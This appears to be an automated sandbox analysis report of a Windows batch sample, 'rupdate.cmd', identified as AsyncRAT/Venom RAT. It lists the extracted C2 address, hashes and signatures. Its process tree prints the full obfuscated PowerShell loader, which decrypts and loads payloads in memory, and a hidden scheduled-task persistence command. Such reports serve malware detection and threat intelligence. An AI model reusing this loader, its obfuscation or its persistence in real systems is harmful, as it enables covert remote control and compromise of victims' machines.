Analysis
max time kernel: 142s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/03/2024, 20:01
Static task: static1
Behavioral task: behavioral1
Sample: rupdate.cmd
Resource: win7-20231129-en
Behavioral task: behavioral2
Sample: rupdate.cmd
Resource: win10v2004-20240226-en
General
Target: rupdate.cmd
Size: 61KB
MD5: e2c6aa50d199d28c6c91c31f4a0cecad
SHA1: 281110edb18aa02b0f7bda95842bbfc89fa18df3
SHA256: ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b
SHA512: 769f9fdff4bb299047733cc899303b1c4af2db0c72dba2aa13c7f1635c8256ee3e06a5ff46755f6c337fb4a87ae0c6d07288cc21fba84d2fa54800a8553a75cf
SSDEEP: 1536:fvRba4CqbY73esiV0iqdvcl0odSVZnm+C:XsfesipWvUw2
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
momentdhs.duckdns.org:8897
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
delay: 1
install: false
install_folder: %AppData%
Signatures
Async RAT payload 1 IoCs
resource: behavioral2/memory/3544-135-0x0000022B33020000-0x0000022B33036000-memory.dmp
yara_rule: family_asyncrat
Blocklisted process makes network request 2 IoCs
flow 57: pid 3544, powershell.exe
flow 62: pid 3544, powershell.exe
Suspicious behavior: EnumeratesProcesses 24 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 32 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 
6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "3⤵PID:3124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\rupdate')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"5⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\6⤵PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 
6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "6⤵PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:81⤵PID:3068
Downloads